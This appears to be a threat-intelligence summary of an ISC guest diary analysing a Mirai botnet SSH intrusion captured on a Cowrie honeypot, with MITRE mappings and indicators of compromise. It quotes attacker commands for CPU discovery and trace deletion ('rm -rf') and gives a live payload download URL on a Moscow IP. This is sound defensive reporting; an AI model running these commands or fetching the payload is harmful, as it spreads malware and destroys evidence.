Threat Research

Mirai-Mirai On The Wall… [Guest Diary]

Securonix

An ISC guest diary analyzes a Mirai-based attack captured on a honeypot, highlighting an automated SSH intrusion that downloads a binary named ‘sh’ from a Moscow IP and executes it. The sample is identified as Trojan.Mirai / miraidownloader, with mitigations to secure IoT devices and patch CVEs. #Mirai #miraidownloader #Cowrie #CVE-2023-1389 #CVE-2023-26801 #CVE-2023-23295

Keypoints

  • An attack on an open Internet-emulated IoT device (honeypot) used Cowrie to log a large, automated intrusion focused on downloading a botnet payload.
  • The intrusion involved 51 SSH commands and produced a 177 KB log, indicating a scripted, automated operation.
  • The malware chain downloads a binary named a binary called ‘sh’ from a remote IP, then attempts to execute it and remove traces.
  • The downloaded payload is associated with Mirai/Mirai-downloader and is tracked with a SHA-256 hash (b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852).
  • The article maps observed behaviors to MITRE techniques, including Unix shell execution and command obfuscation to evade detection.
  • Mitigation emphasizes changing default IoT passwords, patching CVEs, and avoiding exposure of IoT devices to the Internet.

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter – Unix Shell – The attacker used 51 SSH commands before the connection was terminated. Quote: (‘the attacker used 51 SSH commands before the connection was terminated.’)
  • [T1105] Ingress Tool Transfer – The chain downloads a file called ‘sh’ from an IP address from Moscow, Russian Federation. Quote: (‘download a file called “sh” from an IP address from Moscow, Russian Federation.’)
  • [T1082] System Information Discovery – The attacker obtained information about the honeypot’s CPU with the following command: cat /proc/cpuinfo || while read i; do echo $i; done
  • [T1070] Indicator Removal on Host – The attacker attempted to remove traces with rm -rf x86; rm -rf sshdmiori. Quote: (‘rm -rf x86; rm -rf sshdmiori’)
  • [T1027.012] Obfuscated/Compressed Files or Information: Command Obfuscation – The article notes obfuscation via hexadecimal commands and explicitly references Obfuscated Files or Information: Command Obfuscation (T1027.12). Quote: (‘Obfuscated Files or Information: Command Obfuscation (T1027.12)’)
  • [T1110] Brute Force – The honeypot is described as a target for open SSH ports with weak credentials (SSH brute-forcing context). Quote: (‘This particular attack scans for open SSH ports attached to devices with weak administrative credentials.’)

Indicators of Compromise

  • [IP Address] – 46.29.166.61 (used as the download/source for the malicious payload via wget/curl/tftp). Example: http://46.29.166[.]61/sh
  • [URL] – http://46.29.166.61/sh (download URI used by the attacker)
  • [File name] – sh (binary downloaded and executed); x86 (intermediate file where hexadecimal data was assembled)
  • [SHA256] – b1c22ba1b958ba596afb9b1a5cd49abf4eba8d24e85b86b72eed32acc1745852
  • [Note] – Mirai / miraidownloader (malware family) referenced in multiple databases

Read more: https://isc.sans.edu/diary/MiraiMirai+On+The+Wall+Guest+Diary/30658